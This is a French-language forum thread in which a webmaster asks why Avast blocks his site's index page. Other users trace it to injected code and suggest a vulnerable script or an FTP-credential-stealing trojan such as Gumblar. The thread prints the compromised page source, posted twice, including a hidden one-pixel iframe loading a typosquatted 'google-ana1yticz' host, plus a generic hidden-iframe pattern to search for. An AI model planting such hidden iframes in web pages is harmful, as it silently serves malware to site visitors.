# Systmes > Windows > Scurit >  Blocage par Avast : virus:iframe-inf

## jamy2009

Bonjour;
 y a il  quleqlqu'un qui peut m'aider?
J'ai du mal a accder  la page d'index de mon site(juste l'index) une fois que j'active l'antivirus(avast version 4.8) ce dernier bloque ma page index en lui considrant un logiciel malveillant .Avast m'indiquant les paramtrs suivantes:
nom du fichier:url du site
nom du logeciel malveillant:HTML:Iframe-inf
ype:Virus/Ver
version:25/02/2009

je sais pas si l'utilisation des iframe provoque des problmes de scurit ou que mon serveur contient vraiment un virus??
aider moi a comprendre ma source du problme svp!!

----------


## Yakko

As-tu regard les Iframe de ton Index pour vrifier qu'elles sont bien lgitimes?

----------


## jamy2009

Bonjour,
je te remercie tout d'abord pour ton intervention.
oui c'est correctement cris .
en fait je pense pas que c'est un problme de lgitimit car c'est presque mme page index qui se rpt pour les autres pages(mme design) c'est ce que me drange surtout ::oops::

----------


## Yakko

Je pose la question car j'ai dj eu le mme problme avec un ami Webmaster qui c'est retrouv avec une page d'index contenant une Iframe malveillante...Google l'avait d'ailleurs bloqu.
Fais des tests, enlve tes Iframe et tente une connexion. On saura vite si cela viens de l ou pas.

----------


## jamy2009

Bonjour,
Oui j'ai lancer la mme page avec le mme code et a march.
ce qui veut dire que c'est pas le probe du balise iframe.c'est un virus.en effet quand je tlcharge ma page index de serveur pour la modifier la trouve completement vide?? y'a que ce petit script

<p>
<object classid="clsid ::D: 27CDB6E-AE6D-11CF-96B8-444553540000" id="obj1" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" border="0" width="644" height="335">
	<param name="movie" value="ghg.swf">
	<param name="quality" value="High">
	<embed src="ghg.swf" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" name="obj1" width="644" height="335"></object>
</p>
<iframe src="http://google-ana1yticz.com/?click=1FDD0B" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

j'arrive pas  comprendre.Je v chercher la dernire version d'avast pour scanner mon serveur et voir par la suite
 et vous si vous avez des propositions a ma faire c'est avec plaisir.
merci

----------


## jamy2009

Bonjour,
Oui j'ai lancer la mme page avec le mme code et a march.
ce qui veut dire que c'est pas le probe du balise iframe.c'est un virus.en effet quand je tlcharge ma page index de serveur pour la modifier la trouve completement vide?? y'a que ce petit script

<p>
<object classid="clsid ::D: 27CDB6E-AE6D-11CF-96B8-444553540000" id="obj1" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" border="0" width="644" height="335">
	<param name="movie" value="ghg.swf">
	<param name="quality" value="High">
	<embed src="ghg.swf" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" name="obj1" width="644" height="335"></object>
</p>
<iframe src="http://google-ana1yticz.com/?click=1FDD0B" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

j'arrive pas  comprendre.Je v chercher la dernire version d'avast pour scanner mon serveur et voir par la suite
 et vous si vous avez des propositions a ma faire c'est avec plaisir.
merci

----------


## Yakko

Ne cherche pas plus loin, je pense que le "http://google-ana1yticz.com/" t'as mis la puce  l'oreille. Donne nous ton rapport aprs le scan de ton serveur  :;):

----------


## jamy2009

oui je vois  ::cry:: je suis victime de ce virus.
mon serveur est trop plein et trop lourd au mme temps .une fois je le scanerai ainsi que tout les pc reli a lui je ve vous envoy le rapport.
merci

----------


## vladock

Utilise aussi le logiciel spybot pour ton scan.
a pourrais t'aider
 ::D:

----------


## johanvanhoye

Il n'y a probablement pas de virus sur le serveur. Par contre il y a certainement une vulnrabilit dans un script qui a permis  une personne malintentionne de modifier le fichier pour y ajouter l'iframe qui renvoie vers une page sur laquelle se trouve un virus.

Il faut rgulirement mettre  jour les scripts rpendus car plus ils sont rpendus, plus ils sont vulnrables. Les scripts de content management, blog,etc. ou les utilisateurs peuvent mettre du contenu sont particulirement touchs par ce genre d'attaque.

----------


## nathannever

Dsol johanvanhoye, Mais je crois que dans ce cas prcis, il s'agit d'un trojan plac sur le Poste local, il communique alors les logins FTP  (des robots j'imagine ?) qui ensuite se connecte sur le FTP et modifie certain de vos fichier, pas seulement les index, mais d'autre type de fichiers alatoires....

Dans le meilleurs des cas, la modification n'ajoute que des iframes par ci par l, des logiciels gratuit comme notepad++ permettent de les chercher et remplacer la chaine de carctre <iframe src="site.cn/virus.php" style="visibility:hidden"></iframe> par rien (un vide). iframe.attack permet de cleaner toutes les iframes d'un coup, c'est plus rapide mais c'est pas gratuit (y a une dmo sur leur site scarabox.com).

Si par contre, il s'agit d'injection de code javascript, la c'est beaucoup plus complexe, et le remplacement des fichiers s'impose.

NN

----------


## Antoine_935

Je suis du mme avis que Nathannever.
Un virus circule depuis mai dernier, baptis initialement Gumblar.
Il s'installerait via une faille d'Adobe Flash / Reader pour piquer tes mots de passe ftp et ainsi se propager via tes sites.

Quelques dtails ici:
http://forum.ovh.com/showthread.php?t=49433

----------

